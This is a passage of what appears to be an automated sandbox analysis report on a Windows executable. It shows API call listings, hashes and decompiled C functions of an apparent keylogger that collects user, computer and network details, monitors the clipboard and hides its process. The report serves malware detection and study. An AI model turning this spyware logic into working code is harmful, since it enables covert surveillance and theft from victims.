    • #6392.MFC42(?,?,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00420418
    • #1997.MFC42(?,?,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00420420
    • #3180.MFC42(?,?,?,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?), ref: 0042042C
    • #800.MFC42(?,?,?,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?), ref: 00420444
    • #6139.MFC42(00000000,000000FF,?,?,?,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?), ref: 0042044F
    • #800.MFC42(00000000,000000FF,?,?,?,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?), ref: 0042045B
    • #800.MFC42(00000000,000000FF,?,?,?,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?), ref: 00420471
    • #798.MFC42(00000000,000000FF,?,?,?,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?), ref: 00420484
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #6392strlen$#5602#800$lstrcpyn$#540#5857strstr$#1997#3180#350#5194#533#6139#798#860#924#940#941H_prologtime
    • String ID: H<E$bpk.dat$|TD
    • API String ID: 1871987088-1240604741
    • Opcode ID: a3f9236ddc1aada8d76bc77e23f04c640a60815098b1144b35327f1d72508fd6
    • Instruction ID: 84e27b51fe6c8a6343205e31eee78ebf3679f404f2c61911a4476cd156bf7810
    • Opcode Fuzzy Hash: a3f9236ddc1aada8d76bc77e23f04c640a60815098b1144b35327f1d72508fd6
    • Instruction Fuzzy Hash: 8F917E72D0111CAADF15EBA6EC86EEEB7BCAF18304F50415EF511A7182DB386B09CB54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E00426677() {
    				void* __ebx;
    				void* __esi;
    				int _t154;
    				void* _t158;
    				void* _t160;
    				void* _t170;
    				void* _t171;
    				void* _t173;
    				void* _t174;
    				void* _t175;
    				void* _t176;
    				int _t186;
    				void* _t187;
    				void* _t188;
    				void* _t189;
    				void* _t190;
    				void* _t191;
    				char _t192;
    				intOrPtr* _t199;
    				signed int _t235;
    				signed int _t251;
    				char _t269;
    				long _t271;
    				void* _t287;
    
    				E0043E4E0(0x442bf6, _t287);
    				_t271 =  *(_t287 + 8);
    				_t153 = _t271 + 4;
    				 *((intOrPtr*)(_t287 - 0x10)) = _t271 + 4;
    				if( *((intOrPtr*)(_t271 + 4)) == 0) {
    					L2:
    					_t154 = 0;
    				} else {
    					_t283 = _t271 + 0xcc;
    					if( *(_t271 + 0xcc) != 0) {
    						L00412BAB(_t153, 0, _t287 - 0x60, _t269, _t283);
    						_push(0);
    						_push( *((intOrPtr*)(_t271 + 0x100)));
    						 *(_t287 - 4) = 0;
    						_push(_t271 + 0x9a);
    						_t156 = _t271 + 0x68;
    						_push(_t156);
    						_push( *_t271);
    						_push( *((intOrPtr*)(_t287 - 0x10)));
    						L00412C8A(_t156, 0, _t287 - 0x60, _t269, _t283);
    						if(_t156 != 0) {
    							L00411E5A(_t156, 0, _t287 - 0x298, _t269, _t283);
    							_push(_t283);
    							 *(_t287 - 4) = 1;
    							L0043DE26();
    							_push(_t287 - 0x10);
    							 *(_t287 - 4) = 2;
    							_t158 = E00410E20(_t287 - 0x18);
    							_push(0);
    							_push(_t158);
    							 *(_t287 - 4) = 3;
    							L00412165(_t158, 0, _t287 - 0x298, _t269, _t283);
    							 *(_t287 - 4) = 4;
    							L0043DD36();
    							 *(_t287 - 4) = 2;
    							L0043DD36();
    							 *(_t287 - 4) = 1;
    							L0043DD36();
    							_push(_t283);
    							L0043DE26();
    							_push(_t287 - 0x10);
    							 *(_t287 - 4) = 5;
    							_t160 = E00410E20(_t287 - 0x18);
    							 *(_t287 - 4) = 6;
    							E00410E56(_t287 - 0x294, _t160);
    							 *(_t287 - 4) = 7;
    							L0043DD36();
    							 *(_t287 - 4) = 5;
    							L0043DD36();
    							 *(_t287 - 4) = 1;
    							L0043DD36();
    							_push(_t287 - 0x34);
    							L0043E162();
    							_push(_t287 - 0x44);
    							L0043E4A4();
    							 *(_t287 - 0xc8) = 0;
    							GetTimeFormatA(0x400, 2, _t287 - 0x44, 0, _t287 - 0xc8, 0x32);
    							 *(_t287 - 0x94) = 0;
    							GetDateFormatA(0x400, 0, _t287 - 0x44, 0, _t287 - 0x94, 0x32);
    							_t170 = _t287 - 0xc8;
    							_push(_t170);
    							L0043DE26();
    							_t171 = _t287 - 0x94;
    							_push(_t171);
    							 *(_t287 - 4) = 8;
    							L0043DE26();
    							 *(_t287 - 4) = 9;
    							_t173 = E00429029(_t287 - 0x1c, 0xe052);
    							_push(_t171);
    							_push(_t173);
    							_t174 = _t287 - 0x2c;
    							 *(_t287 - 4) = 0xa;
    							_push(_t174);
    							L0043E282();
    							_push(", ");
    							_push(_t174);
    							_t175 = _t287 - 0x20;
    							 *(_t287 - 4) = 0xb;
    							_push(_t175);
    							L0043DE20();
    							_push(_t170);
    							_push(_t175);
    							_t176 = _t287 - 0x10;
    							 *(_t287 - 4) = 0xc;
    							_push(_t176);
    							L0043E282();
    							_push(_t176);
    							 *(_t287 - 4) = 0xd;
    							L0043DFCA();
    							 *(_t287 - 4) = 0xc;
    							L0043DD36();
    							 *(_t287 - 4) = 0xb;
    							L0043DD36();
    							 *(_t287 - 4) = 0xa;
    							L0043DD36();
    							 *(_t287 - 4) = 9;
    							L0043DD36();
    							 *(_t287 - 4) = 8;
    							L0043DD36();
    							 *(_t287 - 4) = 1;
    							L0043DD36();
    							_t269 =  *0x4550cc; // 0x0
    							_t235 = 0x1f;
    							 *(_t287 - 0x1c8) = _t269;
    							memset(_t287 - 0x1c7, 0, _t235 << 2);
    							asm("stosw");
    							asm("stosb");
    							_push(0x1f);
    							 *(_t287 - 0x148) = _t269;
    							memset(_t287 - 0x147, 0, 0 << 2);
    							asm("stosw");
    							asm("stosb");
    							 *(_t287 + 8) = 0x80;
    							GetUserNameA(_t287 - 0x1c8, _t287 + 8);
    							 *(_t287 + 8) = 0x80;
    							_t186 = GetComputerNameA(_t287 - 0x148, _t287 + 8);
    							_push(1);
    							_push(0x29);
    							L0043E34E();
    							_t283 = _t186;
    							_push(1);
    							_push(0x5c);
    							 *(_t287 - 4) = 0xe;
    							L0043E34E();
    							_t187 = _t287 - 0x148;
    							_push(_t187);
    							 *(_t287 - 4) = 0xf;
    							L0043DE26();
    							_push(_t187);
    							_t188 = _t287 - 0x2c;
    							_push(0x453480);
    							_push(_t188);
    							 *(_t287 - 4) = 0x10;
    							L0043E168();
    							_push(_t186);
    							_push(_t188);
    							_t189 = _t287 - 0x1c;
    							 *(_t287 - 4) = 0x11;
    							_push(_t189);
    							L0043E282();
    							 *(_t287 - 4) = 0x12;
    							_push(_t287 - 0x1c8);
    							_push(_t189);
    							_t190 = _t287 - 0x28;
    							_push(_t190);
    							L0043DE20();
    							_push(_t186);
    							_push(_t190);
    							_t191 = _t287 - 0x30;
    							 *(_t287 - 4) = 0x13;
    							_push(_t191);
    							L0043E282();
    							_push(_t191);
    							 *(_t287 - 4) = 0x14;
    							L0043DE1A();
    							 *(_t287 - 4) = 0x13;
    							L0043DD36();
    							 *(_t287 - 4) = 0x12;
    							L0043DD36();
    							 *(_t287 - 4) = 0x11;
    							L0043DD36();
    							 *(_t287 - 4) = 0x10;
    							L0043DD36();
    							 *(_t287 - 4) = 0xf;
    							L0043DD36();
    							 *(_t287 - 4) = 0xe;
    							L0043DD36();
    							 *(_t287 - 4) = 1;
    							L0043DD36();
    							_t192 =  *0x4550cc; // 0x0
    							 *((char*)(_t287 - 0x318)) = _t192;
    							_t251 = 0x1f;
    							memset(_t287 - 0x317, 0, _t251 << 2);
    							asm("stosw");
    							asm("stosb");
    							E0042A943(_t287 - 0x318);
    							E00410EF3(_t287 - 0x378);
    							 *(_t287 - 4) = 0x15;
    							L0043DDD8();
    							 *(_t287 - 4) = 0x16;
    							_t199 = E00429029(_t287 - 0x14, 0xe053);
    							_push(_t287 - 0xc8);
    							_push(_t287 - 0x94);
    							_push(_t287 - 0x1c8);
    							_push(_t287 - 0x318);
    							_push(_t287 - 0x148);
    							_push( *_t199);
    							 *(_t287 - 4) = 0x17;
    							_push(_t287 - 0x24);
    							L0043E174();
    							 *(_t287 - 4) = 0x16;
    							L0043DD36();
    							_push(_t287 - 0x24);
    							L004128F9(_t287 - 0x24, 0, _t287 - 0x298, _t269, _t186);
    							_t156 = _t287 - 0x298;
    							_push(_t287 - 0x298);
    							L00412FF7(_t287 - 0x298, 0, _t287 - 0x60, _t269, _t186);
    							 *(_t287 - 4) = 0x15;
    							L0043DD36();
    							 *(_t287 - 4) = 1;
    							L004110CC(_t287 - 0x298, 0, _t287 - 0x378, _t269, _t283);
    							 *(_t287 - 4) = 0;
    							L00411F64(_t156, 0, _t287 - 0x298, _t269, _t283);
    							_push(1);
    							_pop(0);
    						}
    						 *(_t287 - 4) =  *(_t287 - 4) | 0xffffffff;
    						L00412C30(_t156, 0, _t287 - 0x60, _t269, _t283);
    						_t154 = 0;
    					} else {
    						goto L2;
    					}
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t287 - 0xc));
    				return _t154;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0042667C
    • #537.MFC42(?), ref: 004266F4
    • #800.MFC42 ref: 00426721
    • #800.MFC42 ref: 0042672D
    • #800.MFC42 ref: 00426739
    • #537.MFC42(?), ref: 00426742
    • #800.MFC42(00000000,?), ref: 0042676E
    • #800.MFC42(00000000,?), ref: 0042677A
    • #800.MFC42(00000000,?), ref: 00426786
    • #3811.MFC42(?,00000000,?), ref: 0042678F
    • #6673.MFC42(?,?,00000000,?), ref: 0042679B
    • GetTimeFormatA.KERNEL32(00000400,00000002,?,00000000,?,00000032,?,?,00000000,?), ref: 004267BC
    • GetDateFormatA.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 004267D8
    • #537.MFC42(?), ref: 004267E8
    • #537.MFC42(?,?), ref: 004267FD
      • Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
      • Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
      • Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A
    • #922.MFC42(?,00000000,00000000,?,?), ref: 00426822
    • #924.MFC42(?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 00426835
    • #922.MFC42(?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 00426844
    • #858.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 00426854
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 00426860
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 0042686C
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 00426878
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 00426884
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 00426890
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 0042689C
    • GetUserNameA.ADVAPI32(?,?), ref: 004268E6
    • GetComputerNameA.KERNEL32 ref: 004268FA
    • #536.MFC42(00000029,00000001), ref: 00426907
    • #536.MFC42(0000005C,00000001,00000029,00000001), ref: 00426919
    • #537.MFC42(?,0000005C,00000001,00000029,00000001), ref: 0042692E
    • #926.MFC42(?,00453480,00000000,?,0000005C,00000001,00000029,00000001), ref: 00426941
    • #922.MFC42(?,00000000,00000000,?,00453480,00000000,?,0000005C,00000001,00000029,00000001), ref: 00426950
    • #924.MFC42(?,00000000,?,?,00000000,00000000,?,00453480,00000000,?,0000005C,00000001,00000029,00000001), ref: 00426965
    • #922.MFC42(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00453480,00000000,?,0000005C,00000001,00000029), ref: 00426974
    • #939.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00453480,00000000,?,0000005C,00000001), ref: 00426984
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00453480,00000000,?,0000005C,00000001), ref: 00426990
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00453480,00000000,?,0000005C,00000001), ref: 0042699C
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00453480,00000000,?,0000005C,00000001), ref: 004269A8
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00453480,00000000,?,0000005C,00000001), ref: 004269B4
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00453480,00000000,?,0000005C,00000001), ref: 004269C0
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00453480,00000000,?,0000005C,00000001), ref: 004269CC
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00453480,00000000,?,0000005C,00000001), ref: 004269D8
      • Part of subcall function 0042A943: WSAStartup.WSOCK32(00000101,?), ref: 0042A95B
      • Part of subcall function 0042A943: gethostname.WSOCK32(?,00000064,00000101,?), ref: 0042A96C
      • Part of subcall function 0042A943: lstrcmpA.KERNEL32(?,004550CC,?,00000064,00000101,?), ref: 0042A982
      • Part of subcall function 0042A943: gethostbyname.WSOCK32(?), ref: 0042A994
      • Part of subcall function 0042A943: htonl.WSOCK32(?,?), ref: 0042A9DB
      • Part of subcall function 0042A943: _itoa.MSVCRT ref: 0042A9F0
      • Part of subcall function 0042A943: lstrcatA.KERNEL32(?,?), ref: 0042A9FC
      • Part of subcall function 0042A943: _itoa.MSVCRT ref: 0042AA0E
      • Part of subcall function 0042A943: lstrcatA.KERNEL32(?,00453F68), ref: 0042AA17
      • Part of subcall function 0042A943: strcat.MSVCRT(?,?), ref: 0042AA20
      • Part of subcall function 0042A943: _itoa.MSVCRT ref: 0042AA35
      • Part of subcall function 0042A943: lstrcatA.KERNEL32(?,00453F68), ref: 0042AA3E
      • Part of subcall function 0042A943: strcat.MSVCRT(?,?), ref: 0042AA47
      • Part of subcall function 0042A943: _itoa.MSVCRT ref: 0042AA57
      • Part of subcall function 0042A943: lstrcatA.KERNEL32(?,00453F68), ref: 0042AA60
      • Part of subcall function 00410EF3: __EH_prolog.LIBCMT ref: 00410EF8
      • Part of subcall function 00410EF3: #540.MFC42 ref: 00410F0B
      • Part of subcall function 00410EF3: #540.MFC42 ref: 00410F18
      • Part of subcall function 00410EF3: #537.MFC42(text/plain), ref: 00410F29
      • Part of subcall function 00410EF3: #537.MFC42(iso-8859-1,text/plain), ref: 00410F3A
      • Part of subcall function 00410EF3: #540.MFC42(iso-8859-1,text/plain), ref: 00410F46
      • Part of subcall function 00410EF3: #540.MFC42(iso-8859-1,text/plain), ref: 00410F52
      • Part of subcall function 00410EF3: #540.MFC42(iso-8859-1,text/plain), ref: 00410F5E
      • Part of subcall function 00410EF3: #540.MFC42(iso-8859-1,text/plain), ref: 00410F6A
      • Part of subcall function 00410EF3: #540.MFC42 ref: 00410F9A
      • Part of subcall function 00410EF3: UuidCreate.RPCRT4 ref: 00410FB4
      • Part of subcall function 00410EF3: UuidToStringA.RPCRT4(?,?), ref: 00410FC5
      • Part of subcall function 00410EF3: #860.MFC42(?,?,?,?,?,?,?,?), ref: 00410FD0
      • Part of subcall function 00410EF3: RpcStringFreeA.RPCRT4(?), ref: 00410FD9
    • #540.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00453480,00000000,?,0000005C,00000001), ref: 00426A17
    • #2818.MFC42(?,?,?,?,?,?,?,00000000,?,00000000,00000000,?,00000000,?,?,00000000), ref: 00426A5E
    • #800.MFC42(0000005C,00000001,00000029,00000001), ref: 00426A6D
    • #800.MFC42 ref: 00426A97
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#537#540$#922_itoalstrcat$String$#536#924FormatH_prologNameUuidstrcat$#1168#2818#3811#6673#858#860#926#939ComputerCreateDateFreeLoadStartupTimeUsergethostbynamegethostnamehtonllstrcmp
    • String ID:
    • API String ID: 448821295-0
    • Opcode ID: 8dd36f2ec083411aaf2abe1a7b1e0ae4fd0d73d5863e33e903578102bd5ab31e
    • Instruction ID: db790c9d9ea3b46c3d35e6496e7aaa1a22b378c067be7cf2d95ce2ca2c080a6b
    • Opcode Fuzzy Hash: 8dd36f2ec083411aaf2abe1a7b1e0ae4fd0d73d5863e33e903578102bd5ab31e
    • Instruction Fuzzy Hash: 59D1BC71C0128DEEDB51EBA5C945BDEBBB8AF29308F10419EE105B3182DB785B48CB75
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 74%
    			E00420D64(int __ecx, void* __edx) {
    				void* __esi;
    				char* _t106;
    				void* _t107;
    				int _t109;
    				int _t113;
    				int _t114;
    				int _t115;
    				int _t124;
    				int _t125;
    				struct HWND__* _t126;
    				int _t128;
    				int _t129;
    				struct HWND__* _t133;
    				intOrPtr* _t140;
    				intOrPtr _t141;
    				int _t147;
    				int _t164;
    				intOrPtr* _t170;
    				struct HWND__* _t197;
    				void* _t216;
    				int _t218;
    				char* _t220;
    				intOrPtr _t223;
    				int _t225;
    				void* _t227;
    				void* _t229;
    				intOrPtr _t230;
    				void* _t232;
    
    				_t216 = __edx;
    				E0043E4E0(0x4420d2, _t227);
    				_t230 = _t229 - 0x284;
    				_t225 = __ecx;
    				L0043DF94();
    				_t106 = __ecx + 0x17fe;
    				_t233 =  *_t106;
    				if( *_t106 != 0) {
    					 *_t106 = 0;
    					_t170 = _t227 - 0x10;
    					_push(_t170);
    					L0043E162();
    					_push("pk.bin");
    					 *((intOrPtr*)(__ecx + 0x1a0c)) =  *_t170;
    					_push(0x4558c8);
    					_push(_t227 - 0x14);
    					L0043DE20();
    					 *(_t227 - 4) = 0;
    					E0040BC5C(__ecx + 0x16b8, _t233,  *((intOrPtr*)(_t227 - 0x14)));
    					 *(_t227 - 4) =  *(_t227 - 4) | 0xffffffff;
    					L0043DD36();
    				}
    				_t107 = E004279C9(_t225, _t216);
    				_t235 = _t107;
    				if(_t107 == 0) {
    					__eflags =  *(_t225 + 0x2728);
    					_t218 = 2;
    					if( *(_t225 + 0x2728) != 0) {
    						L10:
    						__eflags =  *(_t225 + 0x17f7);
    						if( *(_t225 + 0x17f7) != 0) {
    							_push(0);
    							E0040B873(_t227 - 0xd0);
    							 *(_t227 - 4) = _t218;
    							 *((intOrPtr*)(_t227 - 0x70)) = _t225 + 0x16b8;
    							L0043DE7A();
    							 *(_t227 - 4) = 3;
    							L00404F36(_t225 + 0x16b8, _t227 - 0x6c, _t225);
    							_t33 = _t227 - 4;
    							 *_t33 =  *(_t227 - 4) | 0xffffffff;
    							__eflags =  *_t33;
    							L0043E04E();
    						}
    						_push("PKL Window");
    						L0043E15C();
    						_push(0);
    						E00422006(_t225);
    						__eflags =  *(_t225 + 0x17cc);
    						if( *(_t225 + 0x17cc) == 0) {
    							L15:
    							_t109 = E00425403(_t225);
    							__eflags = _t109;
    							_push(0);
    							if(_t109 != 0) {
    								E004221C8(_t109, _t225);
    								 *((char*)(_t225 + 0x3e4)) = 1;
    								goto L19;
    							}
    							goto L16;
    						} else {
    							__eflags =  *(_t225 + 0x17e4);
    							if(__eflags == 0) {
    								goto L15;
    							}
    							 *((char*)(_t225 + 0x3e4)) = 0;
    							L19:
    							_push(1);
    							E00421274(_t225, __eflags);
    							__eflags =  *(_t225 + 0x17dc);
    							if(__eflags == 0) {
    								E00428249();
    							} else {
    								E0042817C(_t225, __eflags, 0x4550cc,  *((intOrPtr*)(_t225 + 0x1a14)));
    							}
    							_t113 =  *(_t225 + 0x2758);
    							__eflags = _t113;
    							if(_t113 != 0) {
    								 *_t113(1);
    							}
    							_t114 =  *(_t225 + 0x275c);
    							__eflags = _t114;
    							if(_t114 != 0) {
    								 *_t114( *(_t225 + 0x17de) & 0x000000ff);
    							}
    							_t115 =  *(_t225 + 0x2760);
    							__eflags = _t115;
    							if(_t115 != 0) {
    								 *_t115( *(_t225 + 0x17ef) & 0x000000ff);
    							}
    							SetTimer( *(_t225 + 0x20), _t218, 0x12c, 0);
    							SetTimer( *(_t225 + 0x20), 0x10, 0x2bf20, 0);
    							SetTimer( *(_t225 + 0x20), 0x12, 0x3a98, 0);
    							E0042663D(_t225);
    							E00420784(E00420787(_t225 + 0x78,  *(_t225 + 0x17df) & 0x000000ff), 0);
    							E004034A9(_t225 + 0x78,  *((intOrPtr*)(_t225 + 0x1d34)));
    							 *((intOrPtr*)(_t225 + 0x80)) = 0;
    							_t124 = GetProcAddress(GetModuleHandleA("KERNEL32.DLL"), "RegisterServiceProcess");
    							__eflags = _t124;
    							 *0x455aa4 = _t124;
    							if(_t124 != 0) {
    								 *0x455aa4(GetCurrentProcessId(),  *(_t225 + 0x17e1) & 0x000000ff);
    							}
    							_t125 =  *(_t225 + 0x2768);
    							__eflags = _t125;
    							if(_t125 != 0) {
    								 *_t125( *(_t225 + 0x17e1) & 0x000000ff);
    							}
    							__eflags =  *(_t225 + 0x17c9);
    							if( *(_t225 + 0x17c9) != 0) {
    								SetTimer( *(_t225 + 0x20), 0xe, 0xea60, 0);
    							}
    							__eflags =  *(_t225 + 0x1a18);
    							if( *(_t225 + 0x1a18) != 0) {
    								SetTimer( *(_t225 + 0x20), 0x11, 0xea60, 0);
    							}
    							__eflags =  *(_t225 + 0x17e5);
    							if( *(_t225 + 0x17e5) != 0) {
    								_t147 = ( *(_t225 + 0x1d3c) * 0x3c +  *((intOrPtr*)(_t225 + 0x1d40))) * 0x3e8;
    								__eflags = _t147;
    								SetTimer( *(_t225 + 0x20), 0xf, _t147, 0);
    							}
    							__eflags =  *(_t225 + 0x1d38);
    							if( *(_t225 + 0x1d38) != 0) {
    								 *((intOrPtr*)(_t225 + 0x2738)) = SetClipboardViewer( *(_t225 + 0x20));
    							}
    							__eflags = _t225;
    							if(_t225 != 0) {
    								_t126 =  *(_t225 + 0x20);
    							} else {
    								_t126 = 0;
    							}
    							_push(1);
    							E00428C14(_t126);
    							__eflags =  *(_t225 + 0x17dd);
    							if(__eflags != 0) {
    								_t223 =  *((intOrPtr*)(E00429029(_t227 - 0x10, 0xe02b)));
    								 *(_t227 - 4) = 4;
    								_t140 = E00429029(_t227 - 0x14, 0xe02c);
    								_t232 = _t230 + 0x10;
    								_t141 =  *_t140;
    								__eflags = _t225;
    								 *(_t227 - 4) = 5;
    								if(_t225 != 0) {
    									_t197 =  *(_t225 + 0x20);
    								} else {
    									_t197 = 0;
    								}
    								E00428EEB(_t197, 0, _t141, _t223, 1);
    								_t230 = _t232 + 0x14;
    								 *(_t227 - 4) = 4;
    								L0043DD36();
    								_t80 = _t227 - 4;
    								 *_t80 =  *(_t227 - 4) | 0xffffffff;
    								__eflags =  *_t80;
    								L0043DD36();
    							}
    							_t128 = E00426D6B(__eflags, 1);
    							__eflags =  *(_t225 + 0x17dc);
    							if( *(_t225 + 0x17dc) != 0) {
    								__eflags =  *(_t225 + 0x17e8);
    								if( *(_t225 + 0x17e8) != 0) {
    									_t128 = E00428249();
    								}
    							}
    							__eflags =  *(_t225 + 0x17ee);
    							_t220 = _t225 + 0x17ee;
    							if( *(_t225 + 0x17ee) != 0) {
    								_t128 = E00426AD9(_t225);
    							}
    							__eflags =  *(_t225 + 0x17fc);
    							if( *(_t225 + 0x17fc) != 0) {
    								_t128 = E004279A4(_t225);
    							}
    							 *_t220 = 0;
    							L0043DD54();
    							_t191 = 0x60;
    							 *(_t227 - 0x10) = _t128;
    							__eflags = _t128;
    							 *(_t227 - 4) = 6;
    							if(_t128 == 0) {
    								_t129 = 0;
    								__eflags = 0;
    							} else {
    								_push(_t225);
    								_push(_t191);
    								 *((intOrPtr*)(_t227 - 0x18)) = _t230;
    								_push("bpkch.dat");
    								_push(0x4558c4);
    								_push(_t230);
    								L0043DE20();
    								_t191 =  *(_t227 - 0x10);
    								_t129 = E0040EF63( *(_t227 - 0x10));
    							}
    							 *(_t227 - 4) =  *(_t227 - 4) | 0xffffffff;
    							__eflags =  *(_t225 + 0x17f9);
    							 *(_t225 + 0x60) = _t129;
    							if( *(_t225 + 0x17f9) != 0) {
    								_t191 = _t129;
    								E0040F0EB(_t129);
    							}
    							_push("web.dat");
    							_push(0x4558c4);
    							_push(_t227 - 0x18);
    							L0043DE20();
    							 *(_t227 - 4) = 7;
    							L004144D9(L00414496(_t191),  *((intOrPtr*)(_t227 - 0x18)));
    							_t98 = _t227 - 4;
    							 *_t98 =  *(_t227 - 4) | 0xffffffff;
    							__eflags =  *_t98;
    							L0043DD36();
    							_t133 = GetDlgItem( *(_t225 + 0x20), 0x42d);
    							_push(1);
    							 *(_t225 + 0x272c) = _t133;
    							_pop(0);
    							goto L61;
    						}
    					}
    					_push(0);
    					L0042C15F(_t227 - 0x290);
    					 *(_t227 - 4) = 1;
    					_t164 = E0041AFE1();
    					 *(_t225 + 0x273c) = _t164;
    					 *(_t227 - 0x22c) = _t164;
    					L0043DE7A();
    					__eflags = _t164 - _t218;
    					if(_t164 != _t218) {
    						_t22 = _t227 - 4;
    						 *_t22 =  *(_t227 - 4) | 0xffffffff;
    						__eflags =  *_t22;
    						E004211EB(_t227 - 0x290);
    						goto L10;
    					}
    					__eflags =  *(_t227 - 0x22c);
    					if( *(_t227 - 0x22c) == 0) {
    						 *(_t225 + 0x17dc) = 0;
    						E00428249();
    					}
    					PostMessageA( *(_t225 + 0x20), 0x111, 0xdf, 0);
    					 *(_t227 - 4) =  *(_t227 - 4) | 0xffffffff;
    					E004211EB(_t227 - 0x290);
    					goto L17;
    				} else {
    					E00427AD1(_t235);
    					_push(0);
    					L16:
    					PostMessageA( *(_t225 + 0x20), 0x111, 0xdf, ??);
    					L17:
    					L61:
    					 *[fs:0x0] =  *((intOrPtr*)(_t227 - 0xc));
    					return 0;
    				}
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 00420D69
    • #4710.MFC42 ref: 00420D79
    • #3811.MFC42(?), ref: 00420D90
    • #924.MFC42(?,004558C8,pk.bin,?), ref: 00420DAB
      • Part of subcall function 0040BC5C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040BC82
    • #800.MFC42(?,004558C8,pk.bin,?), ref: 00420DC7
